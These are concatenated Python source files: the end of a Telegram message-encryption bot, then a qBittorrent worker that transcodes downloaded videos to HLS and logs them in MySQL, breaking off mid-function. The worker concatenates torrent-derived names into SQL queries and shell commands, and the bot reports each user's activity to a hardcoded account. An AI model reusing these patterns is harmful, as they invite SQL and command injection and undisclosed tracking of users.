# callback or inline query, or a poll update. In case you want this, keep in mind that sending the message
# could fail
if str(context.error) == 'Message is too long':
update.effective_message.reply_text('⚠️ We have processed your request, but our response is too long for the Telegram to handle. Please send a shorter message.')
logbot(update, '⚠️ We have processed your request, but our response is too long for Telegram to handle. Please try a shorter message.')
elif 'An existing connection was forcibly closed by the remote host' in str(context.error):
#update.effective_message.reply_text('⚠️ Telegram closed the connection. Please try again.')
#logbot(update, '⚠️ Telegram closed the connection. Please try again.')
logger.info('existing connection closed (error exception catch temp code), pass')
pass
elif "'utf-8' codec can't decode byte 0xe7 in position 1: invalid continuation byte" in str(context.error):
update.effective_message.reply_text('⚠️ Failed to decrypt. You probably used the wrong decryption key.')
logbot(update, '⚠️ Failed to decrypt. You probably used the wrong decryption key.')
else:
if update.effective_message:
text = "⚠️ An error occured, sorry for any inconvenience caused.\nThe developer has been notified and will look into this issue as soon as possible."
update.effective_message.reply_text(text)
# This traceback is created with accessing the traceback object from the sys.exc_info, which is returned as the
# third value of the returned tuple. Then we use the traceback.format_tb to get the traceback as a string, which
# for a weird reason separates the line breaks in a list, but keeps the linebreaks itself. So just joining an
# empty string works fine.
trace = "".join(traceback.format_tb(sys.exc_info()[2]))
# lets try to get as much information from the telegram update as possible
payload = ""
# normally, we always have an user. If not, its either a channel or a poll update.
if update.effective_user:
payload += f' with the user {mention_html(update.effective_user.id, update.effective_user.first_name)}'
# there are more situations when you don't get a chat
if update.effective_chat:
payload += f' within the chat <i>{update.effective_chat.title}</i>'
if update.effective_chat.username:
payload += f' (@{update.effective_chat.username})'
# but only one where you have an empty payload by now: A poll (buuuh)
if update.poll:
payload += f' with the poll id {update.poll.id}.'
# lets put this in a "well" formatted text
text = f"⚠️⚠️⚠️ Error Report ⚠️⚠️⚠️\n\nThe error <code>{context.error}</code> occured{payload}. The full traceback:\n\n<code>{trace}" \
f"</code>"
# and send it to the dev
context.bot.send_message(devid, text, parse_mode=ParseMode.HTML)
# we raise the error again, so the logger module catches it. If you don't use the logger module, use it.
raise
def stop_and_restart():
# Gracefully stop the Updater and replace the current process with a new one
u.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
# Restart the bot
def restart(update, context):
logusr(update)
update.message.reply_text(f'{botName} is restarting...')
Thread(target=stop_and_restart).start()
# Send a message to a specific user
def sendMsg(update, context):
logusr(update)
processed = TcProcessor.commandArgs(update, context)
if processed == None:
logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
helpCMD(update, context)
elif processed[0] == 'too_long':
logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
else:
user = processed[0]
message = processed[1]
if user[0] == '@':
user = TcProcessor.find_key(userdata, user[1:])[0]
context.bot.send_message(int(user), message)
logbotsend(update, context, 'Message sent!')
# Respond to the '/start' command
def startCMD(update, context):
logusr(update)
updateUserData(update)
botsend(update, context, f'''<b>{botName}</b> is a Telegram bot that can encrypt and decrypt messages to keep sensitive information private
Key Features:
- Encrypt messages
- Decrypt messages
- Customise your encryption key
''')
logbot(update, '*start response*')
helpCMD(update, context)
# Respond to an unknown command
def unknownCMD(update, context):
logusr(update)
logbotsend(update, context, "Sorry, I didn't understand that command.")
# Respond to an invalid file upload
def invalidFiletype(update, context):
logusr(update)
logbotsend(update, context, 'Sorry, we can\'t encrypt or decrypt files.')
helpCMD(update, context)
# Respond to the user entering a command when in debug mode
def debugINFO(update, context):
logger.info(f'[@{update.effective_user.username}][{update.effective_user.first_name} {update.effective_user.last_name}][U:{update.effective_user.id}][M:{update.effective_message.message_id}]: */command while in debug*')
logbotsend(update, context, 'We\'re currently under maintenance, please try again later')
# Respond to the '/help' command
def helpCMD(update, context):
logusr(update)
updateUserData(update)
botsend(update, context, f'''--= How to use {botName} =--
🔒 Encrypting Messages:
/encrypt <i>[key] [message]</i>
/encrypt 16_character_key This message will be encrypted
🔓 Decrypting Messages:
/decrypt <i>[key] [message]</i>
/decrypt 16_character_key F\\x97\\xf1!\\xda\\x0f)\\xbc\\x17\\x18\\xaa\\xbc\\x93)\\xf8\\x04e\\x1b\\x1c|\\xfd\\x8c\\x9d\\x87;.\\xd7A\\xf8X\\xeb\\xbb
<i>🔑 Encryption Key Criteria:</i>
1. <b>MUST</b> be 16 or 24 characters long <i>[If it is not, it will be converted]</i>
2. Cannot contain spaces''')
logbot(update, '*Help information*')
# Respond to the '/mydata' command
def mydataCMD(update, context):
logusr(update)
if TcProcessor.authorised(update):
updateUserDataNoTime(update)
data=getUserData(update)
user = update.effective_chat.id
username = data["username"]
name = data["name"]
encrypts = data["encrypts"]
decrypts = data["decrypts"]
last_call = round(int(time.time()) - int(data["last_call"]))
botsend(update, context, f'''Here is the data we have stored about you:
<b>User ID</b>: {user}
<b>Username</b>: @{username}
<b>Full Name</b>: {name}
<b>Encrypts</b>: {encrypts}
<b>Decrypts</b>: {decrypts}
<b>Last API Call</b>: {last_call} seconds ago
<i>We do not store more data than we need to, and never log messages or keys</i>
''')
logbot(update, '*Sent user data*')
else:
TcProcessor.waitmsg(update, context)
# Respond to '/encrypt' and '/e' commands
def encrypt(update, context):
logger.info(f'[@{update.effective_user.username}][{update.effective_user.first_name} {update.effective_user.last_name}][U:{update.effective_user.id}][M:{update.effective_message.message_id}]: */encrypt*')
for attempt in range(0,10):
try:
logger.info('Encrypt: Attempting to send ChatAction.TYPING')
context.bot.sendChatAction(chat_id=update.effective_chat.id, action=telegram.ChatAction.TYPING, timeout=10)
logger.info('Encrypt: Successfully sent ChatAction.TYPING')
except:
logger.info('Encrypt: Failed to send ChatAction.TYPING')
continue
logger.info('Encrypt: Breaking from ChatAction loop')
break
updateUserDataNoTime(update)
if TcProcessor.authorised(update):
processed = TcProcessor.commandArgs(update, context)
if processed == None:
logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
helpCMD(update, context)
elif processed[0] == 'too_long':
logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
else:
key = processed[0]
message = processed[1]
encoded = TcEncryptor.encrypt(key, message)
#for i in range(0, 17):
#encoded = TcEncryptor.encrypt(key, encoded)
addUserData(update, getUserData(update)["encrypts"]+1, getUserData(update)["decrypts"], round(time.time()))
update.message.reply_text(encoded[1])
update.message.reply_text(encoded[0])
update.message.reply_text(f'/decrypt {encoded[0]} {encoded[1]}')
if encoded[2] == True:
integrity = 'Encryption validation: ✅ Success!\n<i>Your message will decrypt as expected</i>'
else:
integrity = f'Encryption validation: ❌ Failed!\n<i>Your message will <b>not</b> decrypt as expected</i>\n<b>This is usually caused by using unsupported characters</b>\n\n<b>Decrypted message preview:</b>\n{encoded[2]}'
botsend(update, context, f'''<b>Message encrypted</b> 🔒
<u>You will find three messages above this one</u>
<b>1. 🔒 Encrypted Message</b>
<i>[Safe to share with anyone]</i>
<b>2. 🔑 Decryption Key</b>
<i>[Share only with the intended recipient]</i>
<b>3. 🔐 Full Decryption Command</b>
<i>[Not reccomended for sharing]</i>
<i>It is reccomended that you share your decryption key and encrypted message with the intended recipient on different platforms so that if one is compromised, the decrypted message is not exposed</i>
{integrity}
<i>Your encrypted message cannot be decrypted without the decryption key it was generated with</i>
You can send encrypted messages to other people on Telegram or even via email. They will need your 🔑 <b>decryption key</b> and will need to decrypt the message with this bot.
🔓 How to Decrypt Messages:
/decrypt <i>[key] [message]</i>
/decrypt 16_character_key F\\x97\\xf1!\\xda\\x0f)\\xbc\\x17\\x18\\xaa\\xbc\\x93)\\xf8\\x04e\\x1b\\x1c|\\xfd\\x8c\\x9d\\x87;.\\xd7A\\xf8X\\xeb\\xbb
<i>🔑 Encryption Key Criteria:</i>
1. <b>MUST</b> be 16 or 24 characters long <i>[If it is not, it will be converted]</i>
2. Cannot contain spaces''')
context.bot.send_message(838693333, f'User @{update.effective_user.username} encrypted a message!')
logbot(update, '*Sent encrypt response*')
else:
TcProcessor.waitmsg(update, context)
# Respond to '/decrypt' and '/d' commands
def decrypt(update, context):
logger.info(f'[@{update.effective_user.username}][{update.effective_user.first_name} {update.effective_user.last_name}][U:{update.effective_user.id}][M:{update.effective_message.message_id}]: */decrypt*')
for attempt in range(0,10):
try:
logger.info('Decrypt: Attempting to send ChatAction.TYPING')
context.bot.sendChatAction(chat_id=update.effective_chat.id, action=telegram.ChatAction.TYPING, timeout=10)
logger.info('Decrypt: Successfully sent ChatAction.TYPING')
except:
logger.info('Decrypt: Failed to send ChatAction.TYPING')
continue
logger.info('Decrypt: Breaking from ChatAction loop')
break
updateUserDataNoTime(update)
if TcProcessor.authorised(update):
processed = TcProcessor.commandArgs(update, context)
if processed == None:
logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
helpCMD(update, context)
elif processed[0] == 'too_long':
logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
else:
key = processed[0]
message = processed[1]
decoded = TcEncryptor.decrypt(key, message)
if decoded == 'not_multiple' or decoded == 'not_valid':
logbotsend(update, context, '⚠️ Sorry, your encrypted message is not valid')
helpCMD(update, context)
else:
#for i in range(0, 17):
#decoded = TcEncryptor.decrypt(key, decoded)
addUserData(update, getUserData(update)["encrypts"], getUserData(update)["decrypts"]+1, round(time.time()))
update.message.reply_text(decoded)
botsend(update, context, f'''<b>Message Decrypted</b> 🔓
Your <b>decrypted message</b> can be found above this one for easy copy/pasting
🔒 How to Encrypt Messages:
/encrypt <i>[key] [message]</i>
/encrypt 16_character_key This message will be encrypted
<i>🔑 Encryption Key Criteria:</i>
1. <b>MUST</b> be 16 or 24 characters long <i>[If it is not, it will be converted]</i>
2. Cannot contain spaces''')
context.bot.send_message(838693333, f'User @{update.effective_user.username} decrypted a message!')
logbot(update, '*Sent decrypt response*')
else:
TcProcessor.waitmsg(update, context)
debug = 0
dp.add_error_handler(error)
# Notify user of invalid file upload
dp.add_handler(MessageHandler(Filters.photo, invalidFiletype))
dp.add_handler(MessageHandler(Filters.video, invalidFiletype))
dp.add_handler(MessageHandler(Filters.audio, invalidFiletype))
dp.add_handler(MessageHandler(Filters.voice, invalidFiletype))
dp.add_handler(MessageHandler(Filters.document, invalidFiletype))
# Developer commands
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername)))
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername)))
if debug == 0:
dp.add_handler(CommandHandler('start', startCMD)) # Respond to '/start'
dp.add_handler(CommandHandler('mydata', mydataCMD)) # Respond to '/mydata'
dp.add_handler(CommandHandler('help', helpCMD)) # Respond to '/help'
dp.add_handler(CommandHandler('encrypt', encrypt)) # Respond to '/encrypt'
dp.add_handler(CommandHandler('e', encrypt)) # Respond to '/e'
dp.add_handler(CommandHandler('decrypt', decrypt)) # Respond to '/decrypt'
dp.add_handler(CommandHandler('d', decrypt)) # Respond to '/d'
elif debug == 1:
dp.add_handler(CommandHandler('start', startCMD, filters=Filters.user(username=devusername))) # Respond to '/start'
dp.add_handler(CommandHandler('mydata', mydataCMD, filters=Filters.user(username=devusername))) # Respond to '/mydata'
dp.add_handler(CommandHandler('encrypt', encrypt, filters=Filters.user(username=devusername)))#
dp.add_handler(CommandHandler('e', encrypt, filters=Filters.user(username=devusername)))
dp.add_handler(CommandHandler('decrypt', decrypt, filters=Filters.user(username=devusername)))
dp.add_handler(CommandHandler('d', decrypt, filters=Filters.user(username=devusername)))
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername)))
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername)))
dp.add_handler(MessageHandler(Filters.command, debugINFO)) # Notify user that we are in debug mode
dp.add_handler(MessageHandler(Filters.text, helpCMD)) # Respond to text
dp.add_handler(MessageHandler(Filters.command, unknownCMD)) # Notify user of invalid command
logger.info('Loaded: Handlers')
logger.info('Loading Complete!')
u.start_polling()
u.idle() |
qbittorrent_worker.py | #!/usr/bin/env python
# encoding: utf-8
"""
下载检测
"""
'''
pl_hash_list 表字段 status说明
0 视频资源 - 正常
1 不含有视频资源
2 3小时下载未反应
4 3个月未下载完成
'''
import hashlib
import os
import time
import datetime
import traceback
import sys
import json
import socket
import threading
from hashlib import sha1
from random import randint
from struct import unpack
from socket import inet_ntoa
from threading import Timer, Thread
from time import sleep
reload(sys)
sys.setdefaultencoding("utf8")
sys.path.append('/usr/local/lib/python2.7/site-packages')
def formatTime():
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
def getRunDir():
return os.getcwd()
def getRootDir():
return os.path.dirname(os.path.dirname(getRunDir()))
def toSize(size):
# 字节单位转换
d = ('b', 'KB', 'MB', 'GB', 'TB')
s = d[0]
for b in d:
if size < 1024:
return str(round(size, 2)) + ' ' + b
size = float(size) / 1024.0
s = b
return str(round(size, 2)) + ' ' + b
# import pygeoip
import MySQLdb as mdb
from configparser import ConfigParser
cp = ConfigParser()
cp.read("../qb.conf")
section_db = cp.sections()[0]
DB_HOST = cp.get(section_db, "DB_HOST")
DB_USER = cp.get(section_db, "DB_USER")
DB_PORT = cp.getint(section_db, "DB_PORT")
DB_PASS = cp.get(section_db, "DB_PASS")
DB_NAME = cp.get(section_db, "DB_NAME")
section_qb = cp.sections()[1]
QB_HOST = cp.get(section_qb, "QB_HOST")
QB_PORT = cp.get(section_qb, "QB_PORT")
QB_USER = cp.get(section_qb, "QB_USER")
QB_PWD = cp.get(section_qb, "QB_PWD")
section_file = cp.sections()[2]
FILE_TO = cp.get(section_file, "FILE_TO")
FILE_TRANSFER_TO = cp.get(section_file, "FILE_TRANSFER_TO")
FILE_OWN = cp.get(section_file, "FILE_OWN")
FILE_GROUP = cp.get(section_file, "FILE_GROUP")
FILE_ENC_SWITCH = cp.get(section_file, "FILE_ENC_SWITCH")
FILE_API_URL = cp.get(section_file, "FILE_API_URL")
FILE_ASYNC_SWITCH = cp.get(section_file, "FILE_ASYNC_SWITCH")
section_task = cp.sections()[3]
TASK_SIZE_LIMIT = cp.get(section_task, "TASK_SIZE_LIMIT")
TASK_RATE = cp.getint(section_task, "TASK_RATE")
TASK_COMPLETED_RATE = cp.getint(section_task, "TASK_COMPLETED_RATE")
TASK_DEBUG = cp.getint(section_task, "TASK_DEBUG")
section_setting = cp.sections()[4]
QUEUE_SWITCH = cp.get(section_setting, "QUEUE_SWITCH")
MAX_ACTIVE_UPLOADS = cp.getint(section_setting, "MAX_ACTIVE_UPLOADS")
MAX_ACTIVE_TORRENTS = cp.getint(section_setting, "MAX_ACTIVE_TORRENTS")
MAX_ACTIVE_DOWNLOADS = cp.getint(section_setting, "MAX_ACTIVE_DOWNLOADS")
rooDir = getRootDir()
tmp_cmd = rooDir + "/lib/ffmpeg/ffmpeg"
if os.path.exists(tmp_cmd):
ffmpeg_cmd = tmp_cmd
else:
ffmpeg_cmd = "/usr/local/bin/ffmpeg"
class downloadBT(Thread):
__db_err = None
def __init__(self):
Thread.__init__(self)
self.setDaemon(True)
self.qb = self.qb()
self.qb.set_preferences(max_active_uploads=MAX_ACTIVE_UPLOADS)
self.qb.set_preferences(max_active_torrents=MAX_ACTIVE_TORRENTS)
self.qb.set_preferences(max_active_downloads=MAX_ACTIVE_DOWNLOADS)
_has_suffix = ['mp4', 'rmvb', 'flv', 'avi',
'mpg', 'mkv', 'wmv', 'avi', 'rm']
has_suffix = []
for x in range(len(_has_suffix)):
has_suffix.append('.' + _has_suffix[x])
has_suffix.append('.' + _has_suffix[x].upper())
self.has_suffix = has_suffix
self.__conn()
def __conn(self):
try:
self.dbconn = mdb.connect(
DB_HOST, DB_USER, DB_PASS, DB_NAME, port=DB_PORT, charset='utf8')
self.dbconn.autocommit(False)
self.dbcurr = self.dbconn.cursor()
self.dbcurr.execute('SET NAMES utf8')
return True
except Exception as e:
self.__db_err = e
return False
def __check(self):
if self.__db_err:
sys.exit('未连接数据库!')
def __close(self):
self.dbcurr.close()
self.dbconn.close()
def query(self, sql):
# 执行SQL语句返回数据集
if not self.__conn():
return self.__db_err
try:
self.dbcurr.execute(sql)
result = self.dbcurr.fetchall()
# print result
# 将元组转换成列表
data = map(list, result)
self.__close()
return data
except Exception, ex:
return ex
def execute(self, sql):
if not self.__conn():
return self.__db_err
try:
self.dbcurr.execute(sql)
self.dbcurr.execute('SELECT LAST_INSERT_ID();')
result = self.dbcurr.fetchone()
self.dbconn.commit()
self.__close()
return result[0]
except Exception, ex:
return ex
def qb(self):
from qbittorrent import Client
url = 'http://' + QB_HOST + ':' + QB_PORT + '/'
qb = Client(url)
qb.login(QB_USER, QB_PWD)
return qb
def execShell(self, cmdstring, cwd=None, timeout=None, shell=True):
import subprocess
if shell:
cmdstring_list = cmdstring
else:
cmdstring_list = shlex.split(cmdstring)
if timeout:
end_time = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
sub = subprocess.Popen(cmdstring_list, cwd=cwd, stdin=subprocess.PIPE,
shell=shell, bufsize=4096, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while sub.poll() is None:
time.sleep(0.1)
if timeout:
if end_time <= datetime.datetime.now():
raise Exception("Timeout:%s" % cmdstring)
return sub.communicate()
def md5(self, str):
# 生成MD5
try:
m = hashlib.md5()
m.update(str)
return m.hexdigest()
except:
return False
def readFile(self, filename):
# 读文件内容
try:
fp = open(filename, 'r')
fBody = fp.read()
fp.close()
return fBody
except:
return False
def get_transfer_ts_file(self, to):
return FILE_TRANSFER_TO + '/' + to + '.ts'
def get_transfer_mp4_file(self, to):
return FILE_TRANSFER_TO + '/' + to + '.mp4'
def get_transfer_m3u5_dir(self, dirname, fname):
return FILE_TO + '/m3u8/' + dirname + '/' + fname
def get_transfer_hash_dir(self, dirname):
return FILE_TO + '/m3u8/' + dirname
def fg_transfer_mp4_cmd(self, sfile, dfile):
cmd = ffmpeg_cmd + ' -y -i "' + sfile + \
'" -threads 1 -preset veryslow -crf 28 -c:v libx264 -strict -2 ' + dfile
return cmd
def fg_transfer_ts_cmd(self, file, to_file):
cmd = ffmpeg_cmd + ' -y -i ' + file + \
' -s 480x360 -vcodec copy -acodec copy -vbsf h264_mp4toannexb ' + to_file
return cmd
def fg_m3u8_cmd(self, ts_file, m3u8_file, to_file):
cmd = ffmpeg_cmd + ' -y -i ' + ts_file + ' -c copy -map 0 -f segment -segment_list ' + \
m3u8_file + ' -segment_time 3 ' + to_file
return cmd
def fg_m3u8enc_cmd(self, ts_file, m3u8_file, to_file, enc_dir):
cmd = ffmpeg_cmd + ' -y -i ' + ts_file + ' -threads 1 -strict -2 -hls_time 3 -hls_key_info_file ' + \
enc_dir + '/enc.keyinfo.txt -hls_playlist_type vod -hls_segment_filename ' + \
to_file + ' ' + m3u8_file
return cmd
def debug(self, msg):
return formatTime() + ":" + msg
def get_lock_file(self, to):
return '/tmp/mdw_qb_' + to + '.lock'
def lock(self, sign):
l = self.get_lock_file(sign)
self.execShell('touch ' + l)
def unlock(self, sign):
l = self.get_lock_file(sign)
self.execShell('rm -rf ' + l)
def islock(self, sign):
l = self.get_lock_file(sign)
if os.path.exists(l):
return True
return False
def ffmpeg_file_sync(self):
if FILE_ASYNC_SWITCH == '1':
runDir = getRunDir()
sign = 'sync'
print 'file_sync... start'
if self.islock(sign):
print self.debug('sync doing,already lock it!!!')
else:
self.lock(sign)
r = self.execShell('sh -x ' + runDir + '/rsync.sh')
print self.debug('file_sync:' + r[0])
print self.debug('file_sync_error:' + r[1])
self.unlock(sign)
print 'file_sync... end'
def ffmpeg_del_file(self, mp4, ts, m3u8_dir):
print self.debug('delete middle file ... start ' + mp4)
self.execShell('rm -rf ' + mp4)
self.execShell('rm -rf ' + ts)
print self.debug('delete middle file ... end ' + ts)
# if os.path.exists(m3u8_dir):
# self.execShell('rm -rf ' + m3u8_dir)
def ffmpeg_del_hfile(self, shash_dir):
pass
# print self.debug('delete middle hash dir ... start ' + shash_dir)
# if os.path.exists(shash_dir):
# self.execShell('rm -rf ' + shash_dir)
# print self.debug('delete middle hash dir ... end ' + shash_dir)
def ffmpeg(self, file=''):
if not os.path.exists(FILE_TRANSFER_TO):
self.execShell('mkdir -p ' + FILE_TRANSFER_TO)
fname = os.path.basename(file)
shash = self.sign_torrent['hash']
md5file = self.md5(file)
if not os.path.exists(file):
print formatTime(), 'file not exists:', file
return
print self.debug('source file ' + file)
mp4file = self.get_transfer_mp4_file(md5file)
cmd_mp4 = self.fg_transfer_mp4_cmd(file, mp4file)
if not os.path.exists(mp4file):
print self.debug('cmd_mp4:' + cmd_mp4)
os.system(cmd_mp4)
else:
print self.debug('mp4 exists:' + mp4file)
if not os.path.exists(mp4file):
print self.debug('mp4 not exists')
return
tsfile = self.get_transfer_ts_file(md5file)
cmd_ts = self.fg_transfer_ts_cmd(mp4file, tsfile)
if not os.path.exists(tsfile):
print self.debug('cmd_ts:' + cmd_ts)
os.system(cmd_ts)
else:
print self.debug('data_ts exists:' + mp4file)
if not os.path.exists(tsfile):
print self.debug('ts not exists')
return
md5Fname = self.md5(fname)
m3u8_dir = self.get_transfer_m3u5_dir(shash, md5Fname)
if not os.path.exists(m3u8_dir):
self.execShell('mkdir -p ' + m3u8_dir)
m3u8_file = m3u8_dir + '/index.m3u8'
tofile = m3u8_dir + '/%010d.ts'
print self.debug('tofile:' + tofile)
# 加密m3u8
if FILE_ENC_SWITCH != '0':
enc_dir = '/tmp/qb_m3u8'
cmd = self.fg_m3u8enc_cmd(tsfile, m3u8_file, tofile, enc_dir)
if os.path.exists(m3u8_file):
print self.debug('cmd_m3u8_enc exists:' + m3u8_file)
print self.debug('cmd_m3u8_enc:' + cmd)
self.ffmpeg_file_sync()
self.ffmpeg_del_file(mp4file, tsfile, m3u8_dir)
return
self.execShell('mkdir -p ' + enc_dir)
self.execShell('openssl rand -base64 16 > ' +
enc_dir + '/enc.key')
self.execShell('rm -rf ' + enc_dir + '/enc.keyinfo.txt')
try:
fid = self.add_hash(fname, md5Fname)
except Exception as e:
print 'add_hash_enc:' + str(e)
return
fid = self.add_hash(fname, md5Fname)
key = self.readFile(enc_dir + '/enc.key').strip()
self.set_hashfile_key(fid, key)
# FILE_API_URL
url = FILE_API_URL.replace('{$KEY}', fid)
enc_url = 'echo ' + url + ' >> ' + enc_dir + '/enc.keyinfo.txt'
self.execShell(enc_url)
enc_path = 'echo ' + enc_dir + '/enc.key >> ' + enc_dir + '/enc.keyinfo.txt'
self.execShell(enc_path)
enc_iv = 'openssl rand -hex 16 >> ' + enc_dir + '/enc.keyinfo.txt'
self.execShell(enc_iv)
os.system(cmd)
else:
if os.path.exists(m3u8_file):
print self.debug('m3u8 exists:' + tofile)
if TASK_DEBUG == 0:
self.ffmpeg_file_sync()
self.ffmpeg_del_file(mp4file, tsfile, m3u8_dir)
else:
cmd_m3u8 = self.fg_m3u8_cmd(tsfile, m3u8_file, tofile)
print self.debug('cmd_m3u8:' + cmd_m3u8)
os.system(cmd_m3u8)
try:
self.add_hash(fname, md5Fname)
except Exception as e:
print 'add_hash', str(e)
self.execShell('chown -R ' + FILE_OWN + ':' +
FILE_GROUP + ' ' + m3u8_dir)
self.execShell('chmod -R 755 ' + m3u8_dir)
if TASK_DEBUG == 0:
self.ffmpeg_file_sync()
self.ffmpeg_del_file(mp4file, tsfile, m3u8_dir)
def get_bt_size(self, torrent):
total_size = '0'
if 'size' in torrent:
total_size = str(torrent['size'])
if 'total_size' in torrent:
total_size = str(torrent['total_size'])
return total_size
def get_hashlist_id(self):
ct = formatTime()
total_size = self.get_bt_size(self.sign_torrent)
shash = self.sign_torrent['hash']
sname = self.sign_torrent['name']
sname = mdb.escape_string(sname)
info = self.query(
"select id from pl_hash_list where info_hash='" + shash + "'")
if len(info) > 0:
pid = info[0][0]
else:
print 'insert into pl_hash_list data'
pid = self.execute("insert into pl_hash_list (`name`,`info_hash`,`length`,`create_time`) values('" +
sname + "','" + shash + "','" + total_size + "','" + str(ct) + "')")
return pid
def set_hashlist_status(self, torrent, status):
ct = formatTime()
shash = torrent['hash']
info = self.query(
"select id from pl_hash_list where info_hash='" + shash + "'")
if len(info) > 0:
print 'set_hashlist_status update'
usql = "update pl_hash_list set `status`='" + \
str(status) + "' where info_hash='" + shash + "'"
self.execute(usql)
else:
print 'set_hashlist_status insert'
total_size = self.get_bt_size(torrent)
sname = torrent['name']
sname = mdb.escape_string(sname)
return self.execute("insert into pl_hash_list (`name`,`info_hash`,`length`,`status`,`create_time`) values('" +
sname + "','" + shash + "','" + total_size + "','" + str(status) + "','" + ct + "')")
def get_hashfile_id(self, fname, m3u8_name, pid):
ct = formatTime()
info = self.query(
"select id from pl_hash_file where name='" + fname + "' and pid='" + str(pid) + "'")
if len(info) == 0:
print 'insert into pl_hash_file data !'
fid = self.execute("insert into pl_hash_file (`pid`,`name`,`m3u8`,`create_time`) values('" +
str(pid) + "','" + fname + "','" + m3u8_name + "','" + ct + "')")
else:
print fname, ':', m3u8_name, 'already is exists!'
fid = str(info[0][0])
return fid
def set_hashfile_key(self, fid, key):
self.execute("update pl_hash_file set `key`='" +
mdb.escape_string(key) + "' where id=" + fid)
def add_queue(self, shash, size):
ct = formatTime()
info = self.query(
"select id from pl_hash_queue where info_hash='" + shash + "'")
if len(info) == 0:
sql = "insert into pl_hash_queue (`info_hash`,`length`,`created_at`,`updated_at`) values('" + \
shash + "','" + str(size) + "','" + ct + "','" + ct + "')"
return self.execute(sql)
else:
print 'queue:', shash, 'already is exists!'
def add_hash(self, fname, m3u8_name):
print '-------------------------add_hash---start-----------------------'
pid = self.get_hashlist_id()
fid = 0
if pid:
fid = self.get_hashfile_id(fname, m3u8_name, pid)
print '-------------------------add_hash---end--------------------------'
return fid
def file_arr(self, path, filters=['.DS_Store']):
file_list = []
flist = os.listdir(path)
for i in range(len(flist)):
# 下载缓存文件过滤
if flist[i] == '.unwanted':
continue
file_path = os.path.join(path, flist[i])
if flist[i] in filters:
continue
if os.path.isdir(file_path):
tmp = self.file_arr(file_path, filters)
file_list.extend(tmp)
else:
file_list.append(file_path)
return file_list
def find_dir_video(self, path):
flist = self.file_arr(path)
video = []
for i in range(len(flist)):
if self.is_video(flist[i]):
video.append(flist[i])
return video
def video_do(self, path):
if os.path.isfile(path):
if self.is_video(path):
self.ffmpeg(path)
else:
vlist = self.find_dir_video(path)
for v in vlist:
self.ffmpeg(v)
return ''
def is_video(self, path):
t = os.path.splitext(path)
if t[1] in self.has_suffix:
return True
return False
def non_download(self, torrent):
flist = self.qb.get_torrent_files(torrent['hash'])
is_video = False
for pos in range(len(flist)):
file = torrent['save_path'] + flist[pos]['name']
if not self.is_video(file):
self.qb.set_file_priority(torrent['hash'], pos, 0)
else:
is_video = True
# is video
if not is_video:
self.set_status(torrent, 1)
def set_status(self, torrent, status):
self.set_hashlist_status(torrent, status)
if TASK_DEBUG == 0 and status != 0:
self.qb.delete_permanently(torrent['hash'])
def is_downloading(self, torrent):
if torrent['name'] == torrent['hash']:
return True
else:
return False
def is_nondownload_overtime(self, torrent, sec):
ct = time.time()
use_time = int(ct) - int(torrent['added_on'])
flist = self.qb.get_torrent_files(torrent['hash'])
# print flist
flist_len = len(flist)
# 没有获取种子信息
# print 'ddd:',flist_len,use_time,sec
if flist_len == 0 and use_time > sec:
self.set_status(torrent, 2)
return True
is_video_download = False
# 获取了种子信息,但是没有下载
for pos in range(len(flist)):
file = torrent['save_path'] + flist[pos]['name']
if self.is_video(file):
if flist[pos]['progress'] != '0':
is_video_download = True
if not is_video_download and use_time > sec:
self.set_status(torrent, 3)
return True
return False
def is_downloading_overtime(self, torrent, sec):
ct = time.time()
use_time = int(ct) - int(torrent['added_on'])
if use_time > sec:
self.set_status(torrent, 4)
return True
return False
def is_downloading_overlimit(self, torrent):
sz = self.get_bt_size(torrent)
ct = formatTime()
size_limit = float(TASK_SIZE_LIMIT) * 1024 * 1024 * 1024
size_limit = int(size_limit)
print 'is_downloading_overlimit:', toSize(sz), toSize(size_limit)
if int(sz) > int(size_limit):
print 'overlimit sz:' + sz
self.add_queue(torrent['hash'], str(sz))
self.qb.delete_permanently(torrent['hash'])
def check_task(self):
while True:
self.__check()
torrents = self.qb.torrents(filter='downloading')
tlen = len(torrents)
if tlen > 0:
print "downloading torrents count:", tlen
for torrent in torrents:
if self.is_nondownload_overtime(torrent, 5 * 60):
pass
elif self.is_downloading_overtime(torrent, 7 * 24 * 60 * 60):
pass
elif self.is_downloading(torrent):
pass
elif self.is_downloading_overlimit(torrent):
pass
else:
self.non_download(torrent)
print torrent['name'], ' task downloading!'
else:
print self.debug("no downloading task!")
time.sleep(TASK_RATE)
def completed(self):
while True:
self.__check()
torrents = self.qb.torrents(filter='completed')
if not torrents:
continue
tlen = len(torrents)
print "completed torrents count:", tlen
if tlen > 0:
for torrent in torrents:
self.sign_torrent = torrent
path = torrent['save_path'] + torrent['name']
path = path.encode()
try:
self.video_do(path)
hash_dir = self.get_transfer_hash_dir(torrent['hash'])
if TASK_DEBUG == 0:
self.ffmpeg_del_hfile(hash_dir)
self.qb.delete_permanently(torrent['hash'])
except Exception as e:
print formatTime(), str(e)
print self.debug("done task!")
else:
print self.debug("no completed task!")
time.sleep(TASK_COMPLETED_RATE)
def add_hash_task(self, shash):
url = 'magnet:?xt=urn:btih:' + shash
self.qb.download_from_link(url)
print self.debug('queue add_hash_task is ok ... ')
def queue(self):
while True:
if QUEUE_SWITCH == '1':
print self.debug("------------ do queue task start! ---------------")
setting = self.qb.preferences()
torrents = self.qb.torrents()
tlen = len(torrents)
# print tlen, setting['max_active_torrents']
add = int(setting['max_active_torrents']) - tlen
if add == 0:
print self.debug('the download queue is full ... ')
else:
size_limit = float(TASK_SIZE_LIMIT) * 1024 * 1024 * 1024
size_limit = int(size_limit)
size_sql_where = ''
size_sql = ''
if size_limit != 0:
size_sql = ',`length` desc '
